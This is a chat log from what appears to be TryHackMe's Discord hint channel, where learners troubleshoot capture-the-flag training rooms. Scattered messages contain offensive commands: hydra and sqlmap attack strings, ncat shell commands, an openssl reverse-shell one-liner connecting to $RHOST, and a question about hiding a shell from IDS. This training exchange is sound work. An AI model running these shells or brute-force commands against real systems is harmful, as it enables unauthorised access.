#room-hints

Telnet is on the default port.

You would specify the port if it wasn't default.

nope

i use the kali web based

On THM?

its the same result

yes

It's outdated, so I wouldn't.

like, by 2 years.

oh ok xd

Use your own VM, or the attackbox xD

i will try xD thanks

Gave +1 Rep to @sage steeple

It's changed for that task?

ok mybad xd

it was just the wrong vm

thanks to your help @white salmon

Gave +1 Rep to @sage steeple

Hello, I am working on pickle rick. I just wanted to confirm, if steghide requires a passphrase does that mean there is hidden data within an image?

I haven't got the first ingredient yet, but I think it might be hidden in one of the images from /assets

I tried steghide on portal.jpg and it's asking for a passphrase

oh, well that clears that up. thank you lol

Gave +1 Rep to @dusk totem

hi everyone, I have a question related to the "Password Attacks" room, task 8->3 . I used hydra

http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:failed" -f

but does not get right password

however by using the Success conditional string I got the password, could anyone explain HOW?

hello friends, I am working on the pickle rick room but I'd like a hint if possible.

I have viewed page source and obtained the hidden username in html comments
I have used dirb and found the hidden directory
I have scanned all ports with nmap -A and found port 22 open

When I got to this point I was sure I could use the username I found in html and the phrase I found in the hidden directory to ssh into the machine but it didn't work.

I don't want to follow the guide, I want to try and figure it out myself but I hint would be helpful. Thank you.

I did also find a filtered port open, but I'm not sure if it's anything yet

Have you found the ||login|| directory?

Or the ||.txt|| file

I found the file but not the directory

I did run dirb but it didn't get any hit on that directory?

Whats the name of the directory?

I messaged you, I wasn't sure how to hide spoiler the details

Sure

Hello, could someone please give me a hint on anonymous machine?

Need Help!- Do we have any room in THM for DOS/DDOS.

Need to Learn on how to Detect the live DDOS attack or how to read Wireshark File with that details.

Wireshark file you can do Overpass 2

Hi guys bit of a pain on this question, can anyone help? Intro to Networking Task 7 Question 3 facebook.com registration date; I put in the 01/11/2004 and 03/29/1997 date formats and tried them in other ways but it refuses to accept my answer.

👍 Thanks that worked!

Gave +1 Rep to @burnt rivet

Thank you so much, This will help

Gave +1 Rep to @iron wigeon

i need help in the route whatisnetworking-task4-second question

i cant find the answer

alr thx

ok 👍

i read the thing over and over again but i guess i just missed it

hello people. im currently on network services enumerating ftp and this question baffles me. its asking what variant of ftp is running. how do i figure that out lol? please @ me

many thanks in advance

of course i did

all it told me was the ports

unless i should run a full tcp connect

i dunno 😦

oh wait thats a thing isnt it. lemme open the man page

cuz i did verbose

and nothing extra came up

lmao

my bad

forgot the most important switch

-_-

thank you @burnt rivet

Gave +1 Rep to @burnt rivet

i feel like a real noob

ive been so out of practice lol

anyone have hints for Steel Mountain task 4? every time i try running python 39161.py <ipaddress> <port> i get the message shown in the picture.. I do have an http server and nc session listening but still cacnt figure out what is happening to get this crash

tried running python2 and 3 and got the same issue... ill have to double check the google search i did for the error apparently haha

where do i download rockyou.txt lol

trying to use hydra but dont have the wordlist

hmm

no idea why its not working

what lab are you working on? It is supposed to be there by default but i have been in 3 rooms that haven't had it

but to answer your question https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

off the top of my head i cant recall the exact ones but they are in the Complete Beginner Path.. its the path im working on now

dont worry

its just that it had a different extension

rockyou.txt.gz

i manually went to the folder to look

thanks again @burnt rivet

Gave +1 Rep to @burnt rivet

you're right once again i am thinking attackbox haha its been a long day

all i know is im going to work on this lab again tomorrow and figure stuff out got to play with the urllib stuff since python split it for python3 and i have to leave the office soon

thanks again for your hint @burnt rivet you always push me in the right direction

Gave +1 Rep to @burnt rivet

ladies and gentlemen. i been at it for a long time and i dunno what to do. What is ftp.txt task 10 in network services

when i try to download the ftp.txt file

it says access denied

but i am logged in and mike

so confusion

help me plz

thanks in advance ❤️

okay i got it

works now -_-

hey guys!

anyone done this room? https://tryhackme.com/room/linprivesc

for the last challenge

should i find all possible pe vectors?

or maybe there are a lot of em that are bait and only one works

well finding all possbile pe vectors will help but you only need a couple that actually work to get all the flags

also if you go by using some of the tricks they discuss in this room you will find just a few to be used

need anything specific as a hint???

nah i just needed to know for educational purposes

like it's best if i try and explore everyone of the vectors

for ctfs it helps yes.... for real world pentesting engagements yes of course you need to find all the potential privilege escalation vectors to be able to write them down in your report and help the company patch or prevent them

hey, I am doing the OWASP-Juice-Shop Task4. I am using the AttackMachine and the needed seclists are not installed. Also I cannot install them by "apt-get install seclists". Any ideas? In the Kali-Machine, there is no burp plugin installed. I tried to install it manually and set up the proxy, but it did not intercept properly, for some reason

EDIT: nvm. Found the wordlist. They were just under a different location, than listed in the task 🙂

yuups they are in opt instead of /usr/share

if shadow recall correctly

otherwise when you get into this kinda situation the find command is useful to find where things are stored

yeah, that is how I found it, by the find command, thanks 🙂

Gave +1 Rep to @alpine kestrel

hey guys , ı have been trying to make a progress in network security solutions path , but ı can not make it go when ı came across with evasion via payload manipulation path , is that anyone who is solve the last question ?

any hints on oh my webserver?

still need help for root on oh my webserver

Hey all, in the "Team" CTF I've found the rsa file, but when I try to use it to SSH in I get the error "invalid format." google is so far unhelpful as to what I'm doing wrong to fix that. Any hints on where to look?

Hey, could you share your id_rsa file?
Also, you gotta verify first to be able to share files here

!docs verify

!docs verify

Working on the verification..

Do you know how now?

Yep, just did it.

🙂 Cool.

Remove the first two lines
It should be -

-----BEGIN OPENSSH PRIVATE KEY-----
.
.
.
-----END OPENSSH PRIVATE KEY-----

Got it...

Thanks! knew it was something stupid I was doing wrong

I'm in... 🙂

Looking for very slight hint with foothold for Enterprise

like the most basic possible hint.

I found the ||xlsx and docx files|| but I am kinda stuck on ||how to decrypt them.||

Hi everyone, I have some trouble with a question from Task3 of SNORT room (https://tryhackme.com/room/snort):

According to the official description of the snort, what kind of NIPS is it?

I thought it would be sthg like rule based, but apparently not

Any suggestions?

Hi, what did you do to resolve the issue? I'm banging my head against the wall... 😢

Hey guys, stuck on Burp Suite module Task 13 Qstn 1: failing to find the suspicious page on the site map. What am I missing?

Hi everyone,

Need some assistance here. I cannot see what I am doing wrong here.

I am using sqlmap to get the flag for Task 6 on sqlilab. I amm running the command sqlmap -u http://10.10.110.236:5000/challenge3/login --data="username=admin&password=admin" --level=5 --risk=3 --dbms=sqlite --technique=b --dump

But it is resulting in an error that I cannot seem to get past.

figured it out ..thanks

hey, I am doing this https://tryhackme.com/room/ohmyweb CTF and to get the root.txt should I have to escape the docker

#949380857943175208

Well, it's not a proper docker escape

Enumerate the host network

Hello everyone, can I get a hint on this room using nmap? I'm on task 14 practical and the question is:

"Perform an Xmas scan on the first 999 ports of the target -- how many ports are shown to be open or filtered?

There is a reason given for this -- what is it?

Note: The answer will be in your scan results. Think carefully about which switches to use -- and read the hint before asking for help!"

I did the first part and performed the xmas scan using code 'nmap -sX -vv -p 1-999 10.10.187.1' and got the results.

I don't see the answer in the output of the terminal after running this.

hello, looking for a helping hand in the John the Ripper room, task 6...I've unshadowed the file and passed it into John. but it's taking agesssssss, is it supposed to? I followed the instructions exactly. It's only a four character password so I thought it would have been quicker! If I just have to sit and wait that's fine, but I expected a task question to not take forever. Thank you!

never mind, i trashed the attackbox and restarted it, worked instantly!

Anyone did the room called "Intro to Digital Forensics" ? The very first question "Consider the desk in the photo above. In addition to the smartphone, camera, and SD cards, what would be interesting for digital forensics?". I must say I basically ran out of words, and im tired of guessing. A 6 letter word. Any ideas?

It's really obvious...

Im sure it is, im not a native english speaker so its prob a word i never use.

Ok.

i tried stuff like pencil

No..

papers

Think technology.

im the image there are only postit, a pencil, papers, laptop and the three they mentioned it is not

Are you sure?

if its the fist above picture yea

yea

oh darn.. i spelled it wrong

even look in my response

i even wrote it correctly there.. its those small things that catches me.. hehe.. my spelling

😄

Glad you got it.

yea i was about to think i totally cant see

i began to doubt my own eyes

well done ya muppet... +rep

hello friends, i have been on LFI challenge in the pre-security path for a awhile now...and i can't seem to find my way to the flag on challenge 2...please i need hints on how to think in the right direction to solve the problem..thank you

Do you mean the file inclusion room in Jr pentester path? If so have you checked the hint on that question? It should give you direction

Are you using burpsuite?

Hi folks, hope your all well. I wanted a bit of guidance on John. I'm on the John module, specifically the NTLM windows crack.

Using John to find the format #john --list=formats | grep -iF "NTLM" I get a half dozen suggestions. I tried all three that had NTLM in the body; netntlmv2, netntlm, netntlm-naive via the john syntax.

All of them gave me an error.

In checking with the answer expected, I noticed it was **. So I guess it was NT.

Setting up john again; #john --format=nt --wordlist=/home/rockyou.txt /home/ntlm.txt and running gave me the correct mushroom password.

My question is, why does the format checker give me NT as opposed to the others?

Its a full something.

Its a full something

Anybody started the initial access room ? I need hints on task 8 😴

add a link to the room

Good evening
I'm doing a room provided by my school and I found a file in which it's written :
Help will always be given at Hogwarts to those who ask for it.
I was wondering if it's some sort of meta-hint where i'm supposed to go here or maybe on the school teams to ask ?
I searched the discord for the name of the box and didn't found anything and "Hogwarts" seems to be another unrelated challenge ?
https://tryhackme.com/room/yerawizard
Thanks for the help !

I don't think it's meant to ask here, as usually we do not help with private rooms, especially rooms provided by a school

Oh okay, i'm gonna ask on the teams then, sorry for the inconvenience and thanks for the answer

You can do all three challenges within Dev-Tools

Use Dev-Tool to mod the session

Hello again friends, I am learning gobuster in room CC: Pen Testing, I have a machine deployed, and it wants me to find the hidden directory, but it's not a web app? When I use gobuster dir -w common.txt IP it says URL flag not set, so I put -u before the IP and it says it cant connect? It also doesn't appear to be a web app as I can't load the URL in my browser.

I'm working on the "Network Services" room. I'm on task 4 and attempting the following question:

Lets see if our interesting share has been configured to allow anonymous access, I.E it doesn't require authentication to view the files. We can do this easily by:

- using the username "Anonymous"

- connecting to the share we found during the enumeration stage

- and not supplying a password.

Does the share allow anonymous access? Y/N?

When I try to connect I get the error tree connect failed: NT_STATUS_BAD_NETWORK_NAME and I'm attempting to use the following command to access the SMB share: smbclient //ip-addess/POLOSMB -U anonymous Can anyone point out where my error is with the provided information or is more information needed?

I've tried with the "A" in anonymous capitalized and not capitalized.

the share that you are trying to connect is wrong and does not exist, you need to enumeration the SMB to find the share

the gobuster part have a separate machine make sure you are not on the wrong machine and if you can't load the page try restart the machine because that machine only have port 80 open

Hey guys I am doing the room (Part 3 Linux Fundamentals) where you have to use the wget command to download a file I have completed:

1. Ensure you are connected to the deployed instance (10.10.26.217)
2. Now, use Python 3's "HTTPServer"
   struggling to get access to file
   I have tried the following command with no luck: wget http://10.10.26.217:8000/.flag.txt

which task and question

hey @terse nova its part 3 task 4 - Downloading Files

so are you connected via ssh to the machine

Ahhh i think that might be it thanks I will try now..

Gave +1 Rep to @terse nova

Hi, thank you. I since found that it may have been a problem with my openvpn connection, it seemed to be connected (when I checked through thm) but I closed and opened the connection again and now I can view the website.

Gave +1 Rep to @terse nova

you can check your connection by curl 10.10.10.10/whoami

thanks

what is the purpose of this command… python -c ‘import pty;pty.spawn(“/bin/bash”)’

can see it was used in a walkthrough after creating a session through metasploit

It spawns shell (bash) and attaches your stdin/out to it

Hi all

In Overpass 2 - Hacked , i dont connet to shh port 2222 , i received error nable to negotiate with 10.10.122.175 port 2222: no matching host key type found. Their offer: ssh-rsa

Can help me ?

ssh user@ip -p 2222

Try adding that -oHostKeyAlgorithms=+ssh-rsa

Its work, whats the problem ?

thanks

I think in newer versions of openssh that host key type is deprecated

ok, tks

Stdin/ ???

rsa got deprecated????

sounds weird but sure

yes

I'm not an expert in cryptography nor with ssh, but I think you misinterpret that, maybe read on that to understand what's being deprecated: https://levelup.gitconnected.com/demystifying-ssh-rsa-in-openssh-deprecation-notice-22feb1b52acd

oh yeah that explains it a lot better... thanks fontaene

Gave +1 Rep to @left thunder

it basicly states that SHA1 is being detracted for use as a hashing and signature method for ssh and that happens a lot with the old ssh-rsa thingy and will be fixed by updating it

can someone tell mee why everytime i login thru rdp i get reconnecting attempt (on several machines) and it won't let me connect can someone tell me why please?

Which room, are you on the attackbox or your own machine ?

my own machine

box is the sequel to ice ( blaster if i remember this right)

i also use remmina

And which task are you on ?

i closed my pc right now cuz i got headaches all day on pc but i think it's one of the firsts tasks where it asks u to open the rdp to get some files

Oh, so you not actually trying and the target machine is shut down also? As it's anyways hard to troubleshoot if you are not at it right now

i tried several minutes ago but i got tired cuz of the reconnecting attempt and closed it

i tried it while the machine is online

Ok, well I then suggest you ask again once you are at it, as like I said, hard to troubleshoot if everything is shut down 😄

haha okay thanks Although bro!

Thank you! I think I found what I was looking for.

Gave +1 Rep to @terse nova

congratz

Thank you. Figuring out how to open the file was a different story... Found an easy answer on THM forums but I don't think I woulda found the "get" command without it. Maybe I learned it previously and forgot.. :shrugs: I did take 4 months off from this lol

fundamentals part 2, Task 5, question 1: "On the deployable machine, who is the owner of "important"? // ls -l filename . # not sure where to go from here

In case of that screenshot, the owner would be cmnatic, so apply that to the target machine you are on.

Hi Guys am doing the web fundamentals module and working on the OWASP ZAP room. my issue is I cant seem to get the brute force page. Instructions say I should go to http://10.10.191.231/ where the page appears on the side panel directory. Instead,if I access http://10.10.191.231/ it redirects to https://10.10.191.231/login.php so even when fuzzing I think I am fuzzing the wrong page. Answer I am trying to get is for Task 8 of https://tryhackme.com/room/learnowaspzap. Please help

Can I access your target machines webapp to see myself?

yes please

Hey guys, I'm doing wreath network and im currently on the webserver exploitation stage, my issue is that, the question is asking for root users password hash, but one i enter the hash i got from the shadow file it says incorrect answer

#wreath-network and plz try to follow the provided videos

Okay thanks

You have to login to the webapp first with the creds provided in task 6, after that you can navigate to the page needed for task 8. Note that you have to capture a request while being logged in.

thanks @left thunder - let me do that and provide feedback

Gave +1 Rep to @left thunder

https://tenor.com/view/i-did-it-eric-cartman-south-park-s2e11-roger-ebert-should-eat-less-fatty-foods-gif-21551114

that was my mistake indeed...many thanks!

hey, you might want to verify your profile, to get roles, gif embeds, post screenshots .etc., :)

!docs verify

done thanks

Gave +1 Rep to @cedar anvil

Hey team, am on LFI task 2last qstn: my isssue is this invalid format I am getting....my permissions are good (600) but im stuck...any pointers?

uhmmm I even re-copied and pasted but stll no change

any special way to do it from browser to file?

many thanks @burnt rivet - that did the trick!

Gave +1 Rep to @burnt rivet

Hey Team, so im doing the LFI Walkthrough room(https://tryhackme.com/room/lfi#). I enumerated the system using the LinEnum script then went to GTFO to look for binaries that can help me privilege escalate for all files with s-bit set. Got nothing, whats my next step from here?

I have not done that room, but have you answered question 1 of task 3 ?

Good afternoon, I am running into issues on the Authentication Bypass Brute Force room. The ffuf cmd on task 3 won't get past an error. I did solve task 2 and saved the file just can't get past 3. Any hints to my syntax for the cmd?

yes I have

The file is a the correct name from the previous task .txt it is just the names that were found. The errors and the syntax are in the screen capture.

o

Okay, and by what you have found, did you search for it on gtfobins ?

And what's the error you get? Probably best to share a screenshot. You will have to verify first in order to send screenshots.

!docs verify

so these I the SUID files I got:
[-] SUID files:
-rwsr-sr-x 1 root root 109432 Oct 30 2019 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 44528 Mar 23 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 59640 Mar 23 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 149080 Oct 11 2019 /usr/bin/sudo
-rwsr-xr-x 1 root root 76496 Mar 23 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 40344 Mar 23 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 75824 Mar 23 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 37136 Mar 23 2019 /usr/bin/newuidmap
-rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
-rwsr-xr-x 1 root root 37136 Mar 23 2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 43088 Aug 23 2019 /bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
-rwsr-xr-x 1 root root 26696 Aug 23 2019 /bin/umount
-rwsr-xr-x 1 root root 44664 Mar 23 2019 /bin/su

I then cross-checked the files with any of them on gtfobins in order to get one with the s-bit set. I got no hits...so not sure how I will escalate to root and get the flag....

I'm talking about what you have found to answer question 1, did you search that answer on gtfobins ?

yes I did get a hit for it...but it has no SUID funtcion. so im not sure how to pull it off

But it has sudo

And question 1 was about what the falcon user can run with sudo/root

so my thinking is I have to run a script from gtfobins..check myuser account change from falcon to root....navigate the directory and get my root flag. I might not be understanding the requirements then...

Well, gtfobins is providing you the commands/steps you have to follow to escalate your privileges. So did you try to follow the steps provided ?

There is no script to run whatsoever

understood...no I had not..let me do that

thank you @left thunder - I have succeeded!

Gave +1 Rep to @left thunder

c

does anyone has solved shoda.io room !!

I am not able to find answer of "What is the top operating system for MYSQL servers in Google's ASN? "
yes I have tried : 5.6.40–84.0-log (wrong answer)

What solved it? lol! I'm still getting the same unresponsive screen on the attacker side. So Let me get this straight, ncat -lvnp 1234 -e /bin/bash on the attacker side, and ncat ipnumber 1234 on the victim side correct? Did you need to encode the victim's string with base64 or anything to mask it from the IDS/IPS before hand?

Hey guys, I've been having issues with the authentication bypass room for the Jr Penetration tester path, specifically the brute force section. In the section we have to use a file with usernames that were found with ffuf in the previous section, however when I run the command to try and find the password for the those usernames I don't get any results back. Any idea what I am doing wrong?

Can you verify and send a screenshot please?

!docs verify

Hello!

In the windows fundamentals 1 room there's a question that goes "Besides Clock, Volume, and Network, what other icon is visible in the Notification Area?" I am out of options. What is it?!

Any hints? There's an icon that doesn't even render on the virtual machine.

There is a brief documentation linked about the Notification Area, did you read that already ?

NVM got it

Thank you anyways!

Hey, I'm in the Brainstorm room and can't really figure out why my fuzzer script won't work. If anyone has solved it and are willing to help it'd be appreciated

Please verify and send a screenshot

!docs verify

ok done

howdy. Im doing a wordpress theme editor exploit. I saved my php rev shell to a theme file (404). I forget how to navigate to it to call the shell. anyone remember?

https://www.hackingarticles.in/wordpress-reverse-shell/

found it

Yup yup, that did it 👊🏾😔

Room: https://tryhackme.com/room/webfundamentals
Section: Task 3, question 4.
Question asks: "What's the status code for 'I'm a teapot'?".
The hint it gives speaks of the Mozilla page, I don't understand though. Can somebody lead me in the right direction, please.

Blue room, cant find flag2 even did "search -f flag2.txt

looked at a video to see if i was missing something and found out what location the flags supposed to be in and its not there

ive restarted the machine 3 times

well i found out the answer because of the video but i still wanna know why it was missing

unless i got unlucky and it deleted it 3 times

Follow the link to Mozilla's documentation page provided in the responses section of that task https://developer.mozilla.org/en-US/docs/Web/HTTP/Status and you will find the answer in there

Can anyone give me a nudge on the Room nerd-herd?

Yeh, where are you stuck?

Got the potential username, But don't know what to do next

Idk what I'm missing

You should have the encrypted password as well

Hints are : key is in the video you found
The encrypted text is a cipher

I thought that was a rabbit hole

lol

Yeh, missed it when I did it too

Got it, Thank you @cedar anvil

Gave +1 Rep to @cedar anvil

anyone wanna give me some advice?

this script would take one minute to get executed ikr?

FFUF isn't able to find any Subdomains while fuzzing in CMess box. Is there a particular reason for this?

ffuf -w <wordlist>:FUZZ -u http://something.thm This is command I used

try this:

wfuzz -c -z file,/usr/share/wordlists/wfuzz/general/common.txt -u "http://<domain_name>/" -H "Host: FUZZ.<domain_name>"

Ohhh Vhost fuzz?

remember for finding sub-domains, you need to add a domain in your /etc/hosts

Yeahh I did that, Using -H flag might just work I guess

yeh, normally I'd recommend gobuster as that is really nice for dns or vhosts

Yeah I did try dns in Gobuster but still didn't work.

But dns won't work here on THM😄

shush

Subdomain on the same IP is known as a vhost yeah XD

If you keep correcting every little thing I type, I'll die

Yeah, the Host header.

GET / HTTP/1.0
Host: <vhost>
.
.
.

Hey. I'm stuck in Broken Authentication task in OWASP Top 10. I'm doing as stated register " darren", fill mail n password. Then Sign in, but no luck 🤞. Can someone give a hint or DM me where I went wrong....

is there any room about servers and P2P

If you find one DM me plz

Have you registered the name with the quotation marks ?

Yes

The quotation marks are just there so that you can see that there is a space in front of the username, you are not supposed to actually register the account with these marks

Thanks @left thunder.

Gave +1 Rep to @left thunder

check Extending Your Network room

thx

Gave +1 Rep to @humble cave

anyone wanna give me a hint on how im supposed to use the scripts on the startup room

everything i try i dont have perms

print.sh

lennie

already tried editing /etc/sudoers with it but it said permission denied

wdym

ok give me a couple minutes

yeah dont know how im supposed to use print.sh for escalation since im the owner of it

tried using it to cat /root/root.txt

planner.sh?

when i execute it just says permisson denied

planner.sh

when it starts print.sh

ik

when i checked crontab there was nothing executing it tho

that is a part i missed

I understood that part im just trying to find the cronjob

i ran linpeas.sh but didnt find anything, want does pspy64 do differently?

yeah im reading the github page

im just wondering why i couldn't see the cronjob but pspy64 can, so if i couldn't use pspy64 how could i figure out there was a cronjob

went through both /etc/crontab and /etc/cron.d and nothing stuck out to me.

finished the room but will need to go over again sometime

thank you @white salmon

Gave +1 Rep to @dusk totem

Hey! Sorry to bother you guys, but I am having trouble with a room, and I'm not sure if I'm missing something.

In the Encryption - Crypto 101 room, Task 8's question seems like it should be the easiest thing on THM so far (Who is TryHackMe's HTTPS certificate issued by?) but when I enter in what I believe is the correct answer, I'm getting an incorrect response.

Thoughts??

The certificate may have changed?

I checked some older walkthroughs which had a different answer for that field, so I'm sure it has changed over time, but it looks like it's not taking the current issuer ... unless I'm being MITM'd 😅

No, the answer will be set to what it was before, it won't change in real time to reflect the certificate change, if it that's what's causing it.

nope that is the actual one

That's the actual cert.

from shadows ubuntu machine without an antivirus

seems the room needs an update then

It's an old room.

Certificate changed today.

Perfect timing 😆

or at least shadow assumes their ubuntu machine is not gettign MITM'd

if it is shadow is spooked

Does your Cert have 25/3/22?

2021-03-25 as the start date and 2021-06-23 as the end date

Yup

also lets encrypt

It seems to be something new with lets encrypt
https://letsencrypt.org/certificates/

so it matches the other people in here hence assuming it is fine

It is.

The old answer should work if you have it.

If not, I can give you it.

Unless James changes the answer.

well guess we can leave a report in room-bugs about it now

James has also addressed that too.

Today around 1PM.

It looks like it's looking for a 2 char answer, and the hint says it's not either of the answers that would be in the older walkthroughs ||Cloudflare or Let's Encrypt||

yeah but as kinda proven by us now it has actually changed

Ah, got it! Read the link that @left thunder posted and found what I needed. Thank you!

Gave +1 Rep to @left thunder

Thank you @white salmon

Thank you @alpine kestrel

+rep @white salmon

Gave +1 Rep to @sage steeple

well then time to call it a night

So that no one will be left behind +rep @alpine kestrel

Gave +1 Rep to @alpine kestrel

oh thanks for that @left thunder

Gave +1 Rep to @left thunder

hey in cc pentest room last task i found a hidden directory called secret but im unsure of what to do next. Not sure which of the tools from the room are applicable

this is my furthest progress

Did you visit it?
Perhaps, you may find some secret there

wdym by visit

It's a Web server, isn't it. You can visit it in the browser

Okay thanks @sturdy hearth

Gave +1 Rep to @sturdy hearth

why its not starting?

Is that your personal system or a deployed machine from THM?
I don't think you should be starting firefox.service, it isn't a service.
e.g. apache2.service, fail2ban.service, syslog.service are sevices.

It doesn't exist

as u can see my username its personal

oh ok thank u

Gave +1 Rep to @sturdy hearth

need help with this too

how to fix this vmbox always on top

what does instance mean?

.

"on the deployed machine" in other words

oh ok thanks

Gave +1 Rep to @left thunder

heyy, I'm doing the Relevant room, and I don't seem to find a way to get access. Can it be eternal-blue and i just fuck it up?

Is there like any service I should focus on more?

"Network Services", any hint on how to guess the username on Task 4 exploiting SMB ?

hi can anyone give me a clue

im on my way to the second ingredient

well

since the

clue says look around the filesystem

i checked every file

or smth like this

checked the html pages

there is a comment

oh jeah etc

thanks

quite not sure what to do with that comment

which would be a good place to start to find out what the algorithm is

ahhh base 64

so i kinda decoded it? haha

ill do thanks 🙂

stuck on NETWORK SERVICES 2 room

will continue when i get home from dinner but i am wondering if anyone is willing to do a full walkthrough with me as i dont understand where i am going wrong!

i am a COMPLETE BEGINNER

super super novice

😆

the enumerating task. do i need to use the tryhackme attack box or should i be using a VM or something

it wont nmap properly

ive used write ups but dont understand where i am messing up

on network services 2 room

task 3

NFS

nmap -A -p- IP -vv

shows me 4 ports but im supposed to see 7 according to the answer

anyway will return later, thank you lassi

Burpsuite Help.

When I type in the IP address of the virtual machine into the firefox url it does not take me to the OWASP juice shop. I get an error instead.

So what's the error?

the web page just says error 404

Show a screenshot please with the error so that also the url bar can be seen

how do I get the OWASP juice page to show up?

Hello everyone, any nudge on wonderland room?

hey, i can run openssl as root using doas command and i am suppose to get a reverse shell using this command mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | doas openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s but i am getting the reverse shell as the user i am running this command any solution ?

doesnt work man

You're supposed to use RDP as specified in task 1?

Or you could use the browser version

Attempting XSS in room OWASP Juice Shop. The directions are as followed:

But the header in Burp does not appear the same. Even when I manually input the header line they ask, it doesn't seem to work.

this SS does not have my input. It's just the first one that comes up, untouched.

I just input the extra line True-Client-IP and then forward it.

yes. doesn't seem to work

Okay

the last line I had the input. theres no true client ip in the header when it's initially caught, so i inserted it.

I did not enter "Do Not Track"... that wasn't in there, either but I just left it as-is

and just inserted the string for the XSS

there's the original. It's only 1 line difference

Did you try to add that extra line?

"DNT"?

yeah. doesn't seem to have any effecct

tried it with and without

idk man...

it's a super-simple task. idk why it's not working

What about you highlight the whole header value and url encode it with CTRL + U ?

Other then that I guess I would have to try it on my own

that doesn't seem to work, either. I thought that it might.

Can I try to access your target machine ?

sure. np

Okay, was working fine for me

After you edited the request, what was your next step?

I released the interceptor and allowed the requests to run through.

logged back in and continued to the Last IP page

Did I miss another request?

Well, show me a screenshot of your full and correct request right before realising intercept pls

wait... it did work...

but the XSS popup didn't work... I got the code

I'm very confused now

Maybe you got it because I did it before

So, it worked, but it didnt work

well, maybe

hang on

No just tried it with only releasing, should work fine

before and after...

tried url encoding as well

But again I don't see 2 new lines at the end

what would the 2nd line be?

Nothing, just an empty line

Okay... that was the issue. They never explained that and I'm brand new to http.

thank you. much appreciated.

I just don't understand why it was necessary to add 2 lines

shit... I didn't get the code that time..

I think that determines where the headers end and where the body begins

Ohhhh

I see

thank you... now, i'm not getting the code a second time.

what have i done

I didn't want to cheat so I closed the flag

i'll have to restart the machine... f

You can get it at the end of the task from the scoreboard

In case you didn't already restarted it

In Internal room- logged in to the the wordpress website. And found another credentials for something else. any hints what to do next?

i can edit the site, which gives me xss exploit. themes and plugins are protected from writing

i guess i'm not seeing something

i get this message on every file i wanna edit:You need to make this file writable before you can save your changes. See Changing File Permissions for more information.

❤️

Can i have help with the Rocket room please?

Hi, I'm working on the Windows Internals room (https://tryhackme.com/room/windowsinternals) and I'm stuck on the first question of Task 2. I searched for Procmon on the Windows machine but couldn't find it and I can't download it either since Explorer doesn't seem to be working. What am I missing? :o

Hi everybody,
I'm trying to make this room https://tryhackme.com/room/smaggrotto
But i can't get access to ||http://development.smag.thm/login.php|| is it normaly?
Maybe i'm not on the good way x)

No, so ok i think i must try to do this 😅

Thank you 🙏

Gave +1 Rep to @dusk totem

Hi, for room (https://tryhackme.com/room/networkservices) Task 6, I answer all the previous questions but this one I don't understand what's asked really.

Based on the title returned to us, what do we think this port could be used for?

what title ? the one on the open port ? because I don't see one

Run a more advanced scan on the open port you found, a basic scan won't reveal it

Thanks I will try

Gave +1 Rep to @left thunder

hey, i am doing a room where we have to exploit lfi i have got the code (PHP) any hints what should i do afterwards

don't mind i just found the way :)) btw the room is https://tryhackme.com/room/archangel

this shit makes me wanna kms

sorry in advance for the dumb question. I am in active directory basics room. the first question is asking me what's the windows 10 operating system on the machine.. I have checked system info it seems to be windows server 2019 standard, but this isn't the correct answer. I know I'm doing something dumb, any tips welcome. thanks.

2019 is not Windows 10.

But it could be the long version number. Something like 10.2039.49485833

The build number

20H2 Build number: 19042

That's just generic. I haven't done this room

I'll try that, the syntax for the answer is 7 x * and then 2 x * and then 10 x * etc

I am sure it is windows 10 something something

I tried enterprise edition as a guess but no good

Check msinfo

i run msinfo32 I get OS version microsoft windows server 2019 standard

I'm sure I'll facepalm when I find the answer

Which task is this?

active directory basics hands on lab

active directory basics is the room

hands on lab is the task

Found it. It looks like it starts with ||Windows 10||

ok lol

don't assume I guess

Have you tried the suggested command?

||Get-NetComputer -fulldata | select operatingsystem||

The server is unreachable for me

https://tenor.com/view/baby-crying-baby-crying-gif-5943733

it's not case sensitive right? thanks for the help btw

idk why I'm having so much trouble with windows and powershell

Windows usually isn't

I have an idea....

go on...

Did you set up powerview?

I got it. Powerview is the key to the entire thing. It's all in the part above the task. they just don't make it obvious

thanks very much

Gave +1 Rep to @vernal basin

I'll go back up and try again

Anytime. Thanks for pointing out the room. It's now on my list. 👨‍🎓

Gave +1 Rep to @muted siren

urgent need of help on task 7 please, my head cant take anymore head banging against the keyboard
https://tryhackme.com/room/opsec

Then take a break

Cheers I did a 12hr break and still no joy!

Hey guys I am doing an easy room (Cyborg) and all I am looking for is what I am doing wrong with this certain part. I discovered the hash and using JTR to try to crack the hash using rockyou and I am absolutely getting nothing. I went through walkthrough only to see if others are doing what I am and they seem to be getting the pw. I used "john --wordlist=/usr/share/wordlists/rockyou.txt.gz <filename>"
and it completes without cracking the hash.

I think the rockyou.txt.gz is the problem because I did notice I was the only one having that file with .gz at the end

send screenshots

U are meant to use a file format which is rockyou.txt

Or try unzipping it

let me try this thing real quick, downloading a different rockyou list because I have had this issue before with the list that comes with the kali linux vm

oh I haven't tried that

Then try it buh u should unzip it as root

Good night y'all

Just wanna take a one hour break

that was my problem

thank you

Alright

